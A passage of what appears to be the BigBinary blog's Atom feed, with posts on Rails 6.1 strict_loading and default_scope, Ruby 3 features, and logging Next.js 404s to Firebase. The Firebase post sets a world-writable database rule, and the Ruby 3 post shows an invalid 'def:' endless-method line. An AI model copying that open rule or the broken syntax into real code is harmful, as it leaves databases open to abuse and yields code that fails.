      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-strict_loading-to-warn-lazy-loading-associations"/>
      <updated>2021-01-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-strict_loading-to-warn-lazy-loading-associations</id>
      <content type="html"><![CDATA[<p>Rails 6.1 adds <code>strict_loading</code> mode which can be enabled per record,association, model or across the whole application.</p><p><code>strict_loading</code> mode is an optional setup and it helps in finding <code>N+1</code>queries.</p><p>Let's consider the following example.</p><pre><code class="language-ruby">class Article &lt; ApplicationRecord  has_many :commentsendclass Comment &lt; ApplicationRecord  belongs_to :articleend</code></pre><h4>Mark a record for strict_loading</h4><p>When <code>strict_loading</code> mode is enabled for a record then its associations have tobe eager loaded otherwise Rails raises<code>ActiveRecord::StrictLoadingViolationError</code>.</p><p>Let's see this use case by setting <code>strict_loading</code> mode for an <code>article</code>record.</p><pre><code class="language-ruby">2.7.2 :001 &gt; article = Article.strict_loading.first  Article Load (0.2ms)  SELECT &quot;articles&quot;.* FROM &quot;articles&quot; ORDER BY &quot;articles&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]] =&gt; #&lt;Article id: 1, title: &quot;First article&quot;, content: &quot;First content&quot;, created_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;&gt;2.7.2 :002 &gt; article.strict_loading? =&gt; true2.7.2 :003 &gt; article.commentsTraceback (most recent call last):ActiveRecord::StrictLoadingViolationError (`Comment` called on `Article` is marked for strict_loading and cannot be lazily loaded.)</code></pre><p><code>strict_loading</code> mode forces us to eager load the associated comments by raisingthe <code>ActiveRecord::StrictLoadingViolationError</code> error.</p><p>Let's fix the <code>strict_loading</code> violation error.</p><pre><code class="language-ruby">2.7.2 :004 &gt; article = Article.includes(:comments).strict_loading.first  Article Load (0.7ms)  SELECT &quot;articles&quot;.* FROM &quot;articles&quot; ORDER BY &quot;articles&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]]  Comment Load (0.2ms)  SELECT &quot;comments&quot;.* FROM &quot;comments&quot; WHERE &quot;comments&quot;.&quot;article_id&quot; = ?  [[&quot;article_id&quot;, 1]] =&gt; #&lt;Article id: 1, title: &quot;First article&quot;, content: &quot;First content&quot;, created_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;&gt;2.7.2 :005 &gt; article.comments =&gt; #&lt;ActiveRecord::Associations::CollectionProxy [#&lt;Comment id: 1, desc: &quot;Great article&quot;, article_id: 1, created_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;&gt;  , #&lt;Comment id: 2, desc: &quot;Well written&quot;, article_id: 1, created_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;, updated_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;&gt;]&gt;</code></pre><p><code>strict_loading</code> mode on <code>article</code> record automatically sets <code>strict_loading</code>mode for all the associated <code>comments</code> as well.</p><p>Let's verify this in Rails console.</p><pre><code class="language-ruby">2.7.2 :006 &gt; article.comments.all?(&amp;:strict_loading?) =&gt; true</code></pre><h4>Mark an association for strict_loading</h4><p><code>strict_loading</code> mode can be set up for a specific association.</p><p>Let's update our example to see <code>strict_loading</code> in action when it is passed asan option to associations.</p><pre><code class="language-ruby">class Article &lt; ApplicationRecord  has_many :comments, strict_loading: trueendclass Comment &lt; ApplicationRecord  belongs_to :articleend</code></pre><p>Let's verify this in Rails console.</p><pre><code class="language-ruby">2.7.2 :001 &gt; article = Article.first  Article Load (0.2ms)  SELECT &quot;articles&quot;.* FROM &quot;articles&quot; ORDER BY &quot;articles&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]] =&gt; #&lt;Article id: 1, title: &quot;First article&quot;, content: &quot;First content&quot;, created_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;&gt;2.7.2 :002 &gt; article.strict_loading? =&gt; false2.7.2 :003 &gt; article.commentsTraceback (most recent call last):ActiveRecord::StrictLoadingViolationError (`comments` called on `Article` is marked for strict_loading and cannot be lazily loaded.)2.7.2 :004 &gt; article = Article.includes(:comments).first  Article Load (0.2ms)  SELECT &quot;articles&quot;.* FROM &quot;articles&quot; ORDER BY &quot;articles&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]]  Comment Load (0.2ms)  SELECT &quot;comments&quot;.* FROM &quot;comments&quot; WHERE &quot;comments&quot;.&quot;article_id&quot; = ?  [[&quot;article_id&quot;, 1]] =&gt; #&lt;Article id: 1, title: &quot;First article&quot;, content: &quot;First content&quot;, created_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;&gt;2.7.2 :005 &gt; article.comments =&gt; #&lt;ActiveRecord::Associations::CollectionProxy [#&lt;Comment id: 1, desc: &quot;Great article&quot;, article_id: 1, created_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;&gt;, #&lt;Comment id: 2, desc: &quot;Well written&quot;, article_id: 1, created_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;, updated_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;&gt;]&gt;</code></pre><h4>Configure strict_loading per model</h4><p>We can set <code>strict_loading_by_default</code> option per model to mark all of itsrecords and associations for <code>strict_loading</code>.</p><p>Let's update our example to set <code>strict_loading_by_default</code> for the <code>Article</code>model.</p><pre><code class="language-ruby">class Article &lt; ApplicationRecord  self.strict_loading_by_default = true  has_many :commentsendclass Comment &lt; ApplicationRecord  belongs_to :articleend</code></pre><p>Let's verify this setting in the <code>Article</code> model.</p><pre><code class="language-ruby">2.7.2 :001 &gt; article = Article.includes(:comments).first  Article Load (0.2ms)  SELECT &quot;articles&quot;.* FROM &quot;articles&quot; ORDER BY &quot;articles&quot;.&quot;id&quot; ASC LIMIT ?  [[&quot;LIMIT&quot;, 1]]  Comment Load (0.2ms)  SELECT &quot;comments&quot;.* FROM &quot;comments&quot; WHERE &quot;comments&quot;.&quot;article_id&quot; = ?  [[&quot;article_id&quot;, 1]] =&gt; #&lt;Article id: 1, title: &quot;First article&quot;, content: &quot;First content&quot;, created_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:38.446867000 +0000&quot;&gt;2.7.2 :002 &gt; article.strict_loading? =&gt; true2.7.2 :003 &gt; article.comments.all?(&amp;:strict_loading?) =&gt; false2.7.2 :004 &gt; article.comments =&gt; #&lt;ActiveRecord::Associations::CollectionProxy [#&lt;Comment id: 1, desc: &quot;Great article&quot;, article_id: 1, created_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;, updated_at: &quot;2020-12-01 07:23:58.832869000 +0000&quot;&gt;, #&lt;Comment id: 2, desc: &quot;Well written&quot;, article_id: 1, created_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;, updated_at: &quot;2020-12-01 07:24:02.853376000 +0000&quot;&gt;]&gt;</code></pre><h4>Make strict_loading default across all models</h4><p>We can make <code>strict_loading</code> default across all models by adding the followingline to the Rails configuration file.</p><pre><code class="language-ruby">config.active_record.strict_loading_by_default = true</code></pre><hr><h2>Configure strict_loading violations to show only in logs</h2><p>By default, associations marked for strict loading always raise<code>ActiveRecord::StrictLoadingViolationError</code> for lazy loading.</p><p>However, we may prefer to log such violations in our <code>production</code> environmentinstead of raising errors.</p><p>We can add the following line to the environment configuration file.</p><pre><code class="language-ruby">config.active_record.action_on_strict_loading_violation = :log</code></pre><p>Check out pull requests <a href="https://github.com/rails/rails/pull/37400">#37400</a>,<a href="https://github.com/rails/rails/pull/38541">#38541</a>,<a href="https://github.com/rails/rails/pull/39491">#39491</a> and<a href="https://github.com/rails/rails/pull/40511">#40511</a> for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 allows default_scope to be run on all queries]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-allows-default_scope-to-be-run-on-all-queries"/>
      <updated>2020-12-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-allows-default_scope-to-be-run-on-all-queries</id>
      <content type="html"><![CDATA[<p>Before Rails 6.1 if a <code>default_scope</code> was defined in a model it would be appliedonly for <code>select</code> and <code>insert</code> queries. Rails 6.1 adds an option<code>all_queries: true</code> that could be passed to <code>default_scope</code> to make the scopeapplicable for all queries.</p><pre><code class="language-ruby">default_scope -&gt; { where(...) }, all_queries: true</code></pre><p>Consider the Article class below.</p><pre><code class="language-ruby">class Article  default_scope -&gt; { where(organization_id: Current.organization_id) }end@article.update title: &quot;Hello World&quot;@article.delete</code></pre><p>The <code>update</code> and <code>delete</code> methods would generate SQL queries as shown below. Aswe can see that <code>default_scope</code> is missing from these queries.</p><pre><code class="language-sql">UPDATE &quot;articles&quot; SET &quot;title&quot; = $1 WHERE &quot;articles&quot;.&quot;id&quot; = $2 [[&quot;title&quot;, &quot;Hello World&quot;], [&quot;id&quot;, 146]]DELETE FROM &quot;articles&quot; WHERE &quot;articles&quot;.&quot;id&quot; = $1  [[&quot;id&quot;, 146]]</code></pre><p>In Rails 6.1 we can solve this problem by passing <code>all_queries: true</code> to the<code>default_scope</code>.</p><pre><code class="language-ruby">class Article  default_scope -&gt; { where(organization_id: Current.organization_id) }, all_queries: trueend</code></pre><p>Then the generated SQL changes to this:</p><pre><code class="language-sql">UPDATE &quot;articles&quot; SET &quot;title&quot; = $1 WHERE &quot;articles&quot;.&quot;id&quot; = $2 AND &quot;articles&quot;.&quot;organization_id&quot; = $3  [[&quot;title&quot;, &quot;Hello World&quot;], [&quot;id&quot;, 146], [&quot;organization_id&quot;, 314]]DELETE FROM &quot;articles&quot; WHERE &quot;articles&quot;.&quot;id&quot; = $1 AND &quot;articles&quot;.&quot;organization_id&quot; = $2  [[&quot;id&quot;, 146], [&quot;organization_id&quot;, 314]]</code></pre><p>Ability to make default_scopes applicable to all queries is particularly usefulin the case of multi-tenanted applications, where an <code>organization_id</code> or<code>repository_id</code> is added to the tables to support sharding.</p><p>Check out the <a href="https://github.com/rails/rails/pull/40720">pull request</a> for moredetails on this feature.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3 is released - The list of Ruby 3 features]]></title>
       <author><name>Datt Dongare</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-features"/>
      <updated>2020-12-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-features</id>
      <content type="html"><![CDATA[<p>For all Rubyists, <strong>2020</strong> was a special year. Why wouldn't it be? Ruby 2 wasreleased in 2013. We have been using Ruby 2.x for almost 7 years and we havebeen waiting to see Ruby 3 get released. Finally, the wait is over now.<a href="https://www.ruby-lang.org/en/news/2020/12/25/ruby-3-0-0-released/">Ruby 3.0.0 has been released</a>.It's time to unwrap the gift box and see all the Ruby 3 features we got.</p><h2>Ruby 3 major updates</h2><p>The number <strong>3</strong> is very significant in the Ruby 3 release. Be it releaseversion number, making performance 3x faster, or the trio of corecontributors(Matz, TenderLove, Koichi). Similarly, there were 3 major goals ofRuby 3: being faster, having better concurrency, and ensuring correctness.</p><p><img src="/blog_images/2020/ruby-3-features/ruby-3-features.jpg" alt="Ruby 3 features"></p><h3>1. Ruby 3 performance</h3><p>One of the major focuses for Ruby 3 was the performance. In fact, the initialdiscussion for Ruby 3 was started around it. Matz had set a very ambitious goalof making Ruby 3 times faster.</p><h4>What is Ruby 3x3?</h4><p>Before discussing this, let's revisit Ruby's core philosophy.</p><blockquote><p>&quot;I hope to see Ruby help every programmer in the world to be productive, andto enjoy programming, and to be happy.&quot; - Matz</p></blockquote><p>About Ruby 3x3, some asked whether the goal was to make Ruby the fastestlanguage? The answer is no. The main goal of Ruby 3x3 was to make Ruby 3 timesfaster than Ruby 2.</p><blockquote><p>No language is fast enough. - Matz</p></blockquote><p>Ruby was not designed to be fastest and if it would have been the goal, Rubywouldn't be the same as it is today. As Ruby language gets performance boost, itdefinitely helps our application be faster and scalable.</p><blockquote><p>&quot;In the design of the Ruby language we have been primarily focused onproductivity and the joy of programming. As a result, Ruby was too slow.&quot; -Matz</p></blockquote><p>There are two areas where performance can be measured: memory and CPU.</p><h4>CPU optimization</h4><p>Some enhancements in Ruby internals have been made to improve the speed. TheRuby team has optimized the JIT(Just In Time) compiler from previous versions.<a href="https://bigbinary.com/blog/mjit-support-in-ruby-2-6">Ruby MJIT compiler</a> wasfirst introduced in Ruby 2.6. Ruby 3 MJIT comes with better security and seemsto improve web apps performance to a greater extent.</p><p><img src="/blog_images/2020/ruby-3-features/machine-performance.jpg" alt="CPU optimization"></p><p>MJIT implementation is different from the usual JIT. When methods get calledrepeatedly e.g. 10000 times, MJIT will pick such methods which can be compiledinto native code and put them into a queue. Later MJIT will fetch the queue andconvert them to native code.</p><p>Please check<a href="https://engineering.appfolio.com/appfolio-engineering/2019/7/18/jit-and-rubys-mjit">JIT vs MJIT</a>for more details.</p><h4>Memory optimization</h4><p>Ruby 3 comes with an enhanced garbage collector. It has python's buffer-like APIwhich helps in better memory utilization. Since Ruby 1.8, Ruby has continuouslyevolved in<a href="https://scoutapm.com/blog/ruby-garbage-collection">Garbage collection</a>algorithms.</p><h5>Automatic Garbage Compaction</h5><p>The latest change in garbage collection is<a href="https://engineering.appfolio.com/appfolio-engineering/2019/3/22/ruby-27-and-the-compacting-garbage-collector">Garbage Compaction</a>.It was introduced in Ruby 2.7 where the process was a bit manual. But in version3 it is fully automatic. The compactor is invoked aptly to make sure propermemory utilization.</p><h5>Objects Grouping</h5><p>The garbage compactor moves objects in the heap. It groups dispersed objectstogether at a single place in the memory so that this memory can be used even byheavier objects later.</p><p><img src="/blog_images/2020/ruby-3-features/binary-background.jpg" alt="Memory optimization"></p><h3>2. Parallelism and Concurrency in Ruby 3</h3><p>Concurrency is one of the important aspects of any programming language. Matzfeels that Threads are not the right level of abstraction for Ruby programmersto use.</p><blockquote><p>I regret adding Threads. - Matz</p></blockquote><p>Ruby 3 makes it a lot easier to make applications where concurrency is a majorfocus. There are several features and improvements added in Ruby 3 related toconcurrency.</p><h4>Fibers</h4><p>Fibers are considered a disruptive addition in Ruby 3. Fibers are light-weightworkers which appear like Threads but have some advantages. It consumes lessmemory than Threads. It gives greater control to the programmer to define codesegments that can be paused or resumed resulting in better I/O handling.</p><p><a href="https://github.com/socketry/falcon">Falcon Rack web server</a> uses Async Fibersinternally. This allows Falcon to not block on I/O. Asynchronously managing I/Ogives a great uplift to the Falcon server to serve requests concurrently.</p><h5>Fiber Scheduler</h5><p><a href="https://bugs.ruby-lang.org/issues/16786">Fiber Scheduler</a> is an experimentalfeature added in Ruby 3. It was introduced to intercept blocking operations suchas I/O. The best thing is that it allows lightweight concurrency and can easilyintegrate into the existing codebase without changing the original logic. It'san interface and that can be implemented by creating a wrapper for a gem like<code>EventMachine</code> or <code>Async</code>. This interface design allows separation of concernsbetween the event loop implementation and the application code.</p><p>Following is an example to send multiple <code>HTTP</code> requests concurrently using<code>Async</code>.</p><pre><code class="language-ruby">require 'async'require 'net/http'require 'uri'LINKS = [  'https://bigbinary.com',  'https://basecamp.com']Async do  LINKS.each do |link|    Async do      Net::HTTP.get(URI(link))    end  endend</code></pre><p>Please check <a href="https://github.com/ruby/ruby/blob/master/doc/fiber.md">fibers</a> formore details.</p><h4>Ractors (Guilds)</h4><p>As we know Rubys global <code>VM lock (GVL)</code> prevents most Ruby Threads fromcomputing in parallel.<a href="https://github.com/ruby/ruby/blob/master/doc/ractor.md">Ractors</a> work aroundthe <code>GVL</code> to offer better parallelism. Ractor is an Actor-Model like concurrentabstraction designed to provide a parallel execution without thread-safetyconcerns.</p><p>Ractors allows Threads in different Ractors to compute at the same time. EachRactor has at least one thread, which may contain multiple fibers. In a Ractor,only a single thread is allowed to execute at a given time.</p><p>The following program returns the square root of a really large number. Itcalculates the result for both numbers in parallel.</p><pre><code class="language-ruby"># Math.sqrt(number) in ractor1, ractor2 run in parallelractor1, ractor2 = *(1..2).map do  Ractor.new do    number = Ractor.recv    Math.sqrt(number)  endend# send parametersractor1.send 3**71ractor2.send 4**51p ractor1.take #=&gt; 8.665717809264115e+16p ractor2.take #=&gt; 2.251799813685248e+15</code></pre><h3>3. Static Analysis</h3><p>We need tests to ensure correctness of our program. However by its very naturetests could mean code duplication.</p><blockquote><p>I hate tests because they aren't DRY. - Matz</p></blockquote><p>To ensure the correctness of a program, static analysis can be a great tool inaddition to tests.</p><p>The static analysis relies on inline type annotations which aren't DRY. Thesolution to address this challenge is having <code>.rbs</code> files parallel to our <code>.rb</code>files.</p><h4>RBS</h4><p>RBS is a language to describe the structure of a Ruby program. It provides us anoverview of the program and how overall classes, methods, etc. are defined.Using RBS, we can write the definition of Ruby classes, modules, methods,instance variables, variable types, and inheritance. It supports commonly usedpatterns in Ruby code, and advanced types like unions and duck typing.</p><p>The <code>.rbs</code> files are something similar to <code>.d.ts</code> files in TypeScript. Followingis a small example of how a <code>.rbs</code> file looks like. The advantage of having atype definition is that it can be validated against both implementation andexecution.</p><p>The below example is pretty self-explanatory. One thing we can note here though,<code>each_post</code> accepts a block or returns an enumerator.</p><pre><code class="language-ruby"># user.rbsclass User  attr_reader name: String  attr_reader email: String  attr_reader age: Integer  attr_reader posts: Array[Post]  def initialize: (name: String,                   email: String,                   age: Integer) -&gt; void  def each_post: () { (Post) -&gt; void } -&gt; void                   | () -&gt; Enumerator[Post, void]end</code></pre><p>Please check <a href="https://github.com/ruby/rbs">RBS gem documentation</a> for moredetails.</p><h4>Typeprof</h4><p>Introducing type definition was a challenge because there is already a lot ofexisting Ruby code around and we need a tool that could automatically generatethe type signature. Typeprof is a type analysis tool that reads plain Ruby codeand generates a prototype of type signature in RBS format by analyzing themethods, and its usage. Typeprof is an experimental feature. Right now onlysmall subset of ruby is supported.</p><blockquote><p>Ruby is simple in appearance, but is very complex inside, just like our humanbody. - Matz</p></blockquote><p>Let's see an example.</p><pre><code class="language-ruby"># user.rbclass User  def initialize(name:, email:, age:)    @name, @email, @age = name, email, age  end  attr_reader :name, :email, :ageendUser.new(name: &quot;John Doe&quot;, email: 'john@example.com', age: 23)</code></pre><p>Output</p><pre><code class="language-ruby">$ typeprof user.rb# Classesclass User  attr_reader name : String  attr_reader email : String  attr_reader age : Integer  def initialize : (name: String,                    email: String,                    age: Integer) -&gt; [String, String, Integer]end</code></pre><h2>Other Ruby 3 features and changes</h2><p>In the 7-year period, the Ruby community has seen significant improvement inperformance and other aspects. Apart from major goals, Ruby 3 is an excitingupdate with lots of new features, handy syntactic changes, and new enhancements.In this section, we will discuss some notable features.</p><blockquote><p>We are making Ruby even better. - Matz</p></blockquote><h3>One-line pattern matching syntax change</h3><p>Previously one-line pattern matching used the keyword <code>in</code>. Now it's replacedwith <code>=&gt;</code>.</p><h6>Ruby 2.7</h6><pre><code class="language-ruby">  { name: 'John', role: 'CTO' } in {name:}  p name # =&gt; 'John'</code></pre><h6>Ruby 3.0</h6><pre><code class="language-ruby">  { name: 'John', role: 'CTO' } =&gt; {name:}  p name # =&gt; 'John'</code></pre><h3>Find pattern</h3><p>The<a href="https://github.com/ruby/ruby/blob/9738f96fcfe50b2a605e350bdd40bd7a85665f54/test/ruby/test_pattern_matching.rb">find pattern</a>was introduced in <code>Ruby 2.7</code> as an experimental feature. This is now part of<code>Ruby 3.0</code>. It is similar to pattern matching in <code>Elixir</code> or <code>Haskell</code>.</p><pre><code class="language-ruby">users = [  { name: 'Oliver', role: 'CTO' },  { name: 'Sam', role: 'Manager' },  { role: 'customer' },  { name: 'Eve', city: 'New York' },  { name: 'Peter' },  { city: 'Chicago' }]users.each do |person|  case person  in { name:, role: 'CTO' }    p &quot;#{name} is the Founder.&quot;  in { name:, role: designation }    p &quot;#{name} is a #{designation}.&quot;  in { name:, city: 'New York' }    p &quot;#{name} lives in New York.&quot;  in {role: designation}    p &quot;Unknown is a #{designation}.&quot;  in { name: }    p &quot;#{name}'s designation is unknown.&quot;  else    p &quot;Pattern not found.&quot;  endend&quot;Oliver is the Founder.&quot;&quot;Sam is a Manager.&quot;&quot;Unknown is a customer.&quot;&quot;Eve lives in New York.&quot;&quot;Peter's designation is unknown.&quot;&quot;Pattern not found.&quot;</code></pre><h3>Endless Method definition</h3><p>This is another syntax enhancement that is optional to use. It enables us tocreate method definitions<a href="https://bigbinary.com/blog/ruby-3-adds-endless-method-definition">without end keyword</a>.</p><pre><code class="language-ruby">def: increment(x) = x + 1p increment(42) #=&gt; 43</code></pre><h3>Except method in Hash</h3><p>Sometimes while working on a non Rails app I get <code>undefined method except</code>. The<code>except</code> method was available only in Rails. In Ruby 3 <code>Hash#except</code> was<a href="https://bigbinary.com/blog/ruby-3-adds-new-method-hash-except">added to Ruby</a>itself.</p><pre><code class="language-ruby">user = { name: 'Oliver', age: 29, role: 'CTO' }user.except(:role) #=&gt; {:name=&gt; &quot;Oliver&quot;, :age=&gt; 29}</code></pre><h3>Memory View</h3><p>This is again an experimental feature. This is a C-API that will allow extensionlibraries to exchange raw memory area. Extension libraries can also sharemetadata of memory area that consists of shape and element format. It wasinspired by<a href="https://docs.python.org/3/c-api/buffer.html">Pythons buffer protocol</a>.</p><h3>Arguments forwarding</h3><p>Arguments forwarding <code>(...)</code> now supports leading arguments.</p><p>It is helpful in <code>method_missing</code>, where we need method name as well.</p><pre><code class="language-ruby">def method_missing(name, ...)  if name.to_s.end_with?('?')    self[name]  else    fallback(name, ...)  endend</code></pre><h3>Other Notable changes</h3><ul><li>Pasting in IRB is much faster.</li><li>The order of backtrace had been<a href="https://bigbinary.com/blog/ruby-2-5-prints-backstrace-and-error-message-in-reverse-order">reversed</a>.The error message and line number are printed first, rest of the backtrace isprinted later.</li><li><a href="https://bigbinary.com/blog/ruby-3-supports-transforming-hash-keys-using-a-hash-argument">Hash#transform_keys</a>accepts a hash that maps old keys with new keys.</li><li>Interpolated String literals are no longer frozen when<code># frozen-string-literal: true</code> is used.</li><li>Symbol#to_proc now returns a lambda Proc.</li><li><a href="https://bigbinary.com/blog/ruby-3-adds-symbol-name">Symbol#name</a> has beenadded, which returns the symbol's name as a frozen string.</li></ul><p>Many other changes can be checked at<a href="https://github.com/ruby/ruby/blob/v3_0_0_preview2/NEWS.md">Ruby 3 News</a> formore details.</p><h2>Transition</h2><p>A lot of core libraries have been modified to fit the Ruby 3 goal needs. Butthis doesn't mean that our old applications will suddenly stop working. The Rubyteam has made sure that these changes are backward compatible. We might see somedeprecation warnings in our existing code. The developers can fix these warningsto smoothly transition from an old version to the new version. We are all set touse new features and get all new performance improvements.</p><h2>Conclusion</h2><p>With great improvements in performance, memory utilization, static analysis, andnew features like Ractors and schedulers, we have great confidence in the futureof Ruby. With Ruby 3, the applications can be more scalable and more enjoyableto work with. The coming 2021 is not just a new year but rather a new era forall Rubyists. We at BigBinary thank everyone who contributed towards the Ruby 3release directly or indirectly.</p><p>Happy Holidays and Happy New Year folks!!!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Catch 404 urls in Next.js and write them to firebase]]></title>
       <author><name>Piyush Sinha</name></author>
      <link href="https://www.bigbinary.com/blog/catch-404-urls-in-nextjs"/>
      <updated>2020-12-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/catch-404-urls-in-nextjs</id>
      <content type="html"><![CDATA[<p>We recently jumped on the <a href="https://www.netlify.com/jamstack/">Jamstack</a>bandwagon and moved our BigBinary website to use <a href="https://nextjs.org">next.js</a>.We also migrated <a href="https://bigbinary.com/blog">BigBinary Blog</a> to using next.js.</p><p>In the process of migration we knew we might have missed handling a few urls.We wanted to know all the urls which are resulting in 404 now.</p><p>Traditionally, a static site is not able to catch all the 404s.However with next.js we can capture the urls resulting in 404 and we can write those urls to firebase.</p><h3>Setting up Firebase</h3><p>Get Started with<a href="https://console.firebase.google.com/">Firebase</a>and create an account.Add a project there and then add a &quot;Web app&quot; inside that project.After that, you will find web apps Firebase configuration something like this.</p><pre><code class="language-js">var firebaseConfig = {apiKey: XXXXXXXXXXXXXXXXXXXXXXXX,authDomain: test-XXXX.firebaseapp.com,databaseURL: https://test-XXXX-default-rtdb.firebaseio.com&quot;,projectId: test-XXXX,storageBucket: test-XXX.appspot.com,messagingSenderId: 00000000000,appId: 1:00000000:web:XXXXX00000XXXXXXX};</code></pre><p>Edit rules in Rules section like this.</p><pre><code class="language-json">{  &quot;rules&quot;: {    &quot;.read&quot;: false,    &quot;.write&quot;: true  }}</code></pre><h3>Creating custom 404</h3><p>To create a custom 404 page create a <code>pages/404.js</code> file.At build time this file is statically generated and would serve as the 404 page for the application.This page would look like this.</p><pre><code class="language-javascript">import { useEffect } from &quot;react&quot;;import firebase from &quot;firebase&quot;;export default function Custom404() {  useEffect(() =&gt; {    const firebaseConfig = {    apiKey: XXXXXXXXXXXXXXXXXXXXXXXX,    authDomain: test-XXXX.firebaseapp.com,    databaseURL: https://test-XXXX-default-rtdb.firebaseio.com&quot;,    projectId: test-XXXX,    storageBucket: test-XXX.appspot.com,    messagingSenderId: 00000000000,    appId: 1:00000000:web:XXXXX00000XXXXXXX    }    firebase.initializeApp(firebaseConfig).database().ref().child(&quot;404s&quot;).push(window.location.href);  }, []);  return &lt;h1&gt;404 - Page Not Found&lt;/h1&gt;;}</code></pre><p>Now all the 404s will be caught and would be written to the firebase.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6.1 adds where.associated to check association presence]]></title>
       <author><name>Nithin Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-1-adds-where-associated-to-check-association-presence"/>
      <updated>2020-12-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-1-adds-where-associated-to-check-association-presence</id>
      <content type="html"><![CDATA[<p>Rails 6.1 simplifies how to check whether an association exists by adding a new <code>associated</code> method.</p><p>Let's see an example of it.</p><pre><code class="language-ruby">class Account &lt; ApplicationRecord  has_many :users, -&gt; { joins(:contact).where.not(contact_id: nil) }end</code></pre><p>This will return all users with contacts.If we rephrase that sentence then we can say that &quot;this will return all users who are associated with contacts&quot;.</p><p>Let's see how we can do the same with the new <code>associated</code> method.</p><pre><code class="language-ruby">class Account &lt; ApplicationRecord  has_many :users, -&gt; { where.associated(:contact) }end</code></pre><p>Now we can see that the usage of <code>associated</code> decreases some of the  syntactic noise we saw in the first example. This method is essentially a syntactic sugar over the <code>inner_joins(:contact)</code>.</p><p>Check out the<a href="https://github.com/rails/rails/pull/40696">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 3 supports transforming hash keys using a hash argument]]></title>
       <author><name>Yedhin Kizhakkethara</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-3-supports-transforming-hash-keys-using-a-hash-argument"/>
      <updated>2020-12-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-3-supports-transforming-hash-keys-using-a-hash-argument</id>
      <content type="html"><![CDATA[<p>From Ruby 3 onwards, the <code>Hash#transform_keys</code> methodaccepts a hash argument for transformingexisting keys to new keys as specified in the argument.</p><h5>Usage before Ruby 3</h5><p>The following example shows how we used to apply <code>transform_keys</code>:</p><pre><code class="language-ruby"># 1. Declare address hashirb(main)&gt; address = {House: 'Kizhakkethara', house_no: 123, locality: 'India'}=&gt; {:House=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :locality=&gt;&quot;India&quot;}# 2. Lowercase all the keysirb(main)&gt; address.transform_keys(&amp;:downcase)=&gt; {:house=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :locality=&gt;&quot;India&quot;}# 3. Replace a particular key with a new key along with lowercasingirb(main)* address.transform_keys do |key|irb(main)*   new_key = keyirb(main)*   if key == :localityirb(main)*     new_key = :countryirb(main)*   endirb(main)*   new_key.to_s.downcase.to_symirb(main)&gt; end=&gt; {:house=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :country=&gt;&quot;India&quot;}</code></pre><p>Although the changes required are trivial,we ended up writing a block to do the job.But what happens when the number of keysthat needs to be transformed increases?Do we need to write n-number of conditions within a block?Not anymore!</p><h5>Introducing Hash#transform_keys with hash argument</h5><p>Let's take the same example and provide a hash,which will be used for the transformation:</p><pre><code class="language-ruby"># 1. Declare address hashirb(main)&gt; address = {House: 'Kizhakkethara', house_no: 123, locality: 'India'}=&gt; {:House=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :locality=&gt;&quot;India&quot;}# 2. Provide hash with transform_keysirb(main)&gt; address.transform_keys({House: :house, locality: :country})=&gt; {:house=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :country=&gt;&quot;India&quot;}</code></pre><p>That does the job.But let's try to improve this code.Ultimately what happens when we invoke that methodis that it goes througheach of the keys in our variableandmaps the existing keys to the new keys.The <code>transform_keys</code> method accepts a block as a parameter.Thus let's pass in the <code>downcase</code> method as a <code>Proc</code> argument:</p><pre><code class="language-ruby"># 1. Passing in block parametersirb(main)&gt; address.transform_keys({locality: :country}, &amp;:downcase)=&gt; {:house=&gt;&quot;Kizhakkethara&quot;, :house_no=&gt;123, :country=&gt;&quot;India&quot;}</code></pre><p>An important point to be noted about the block parameter is that,<strong>it's only applied to keys which are not specified in the hash argument</strong>.</p><h3>Other common use cases</h3><h5>Transforming params received in the Rails controller</h5><pre><code class="language-ruby"># 1. Declare paramsirb(rails)&gt; params = 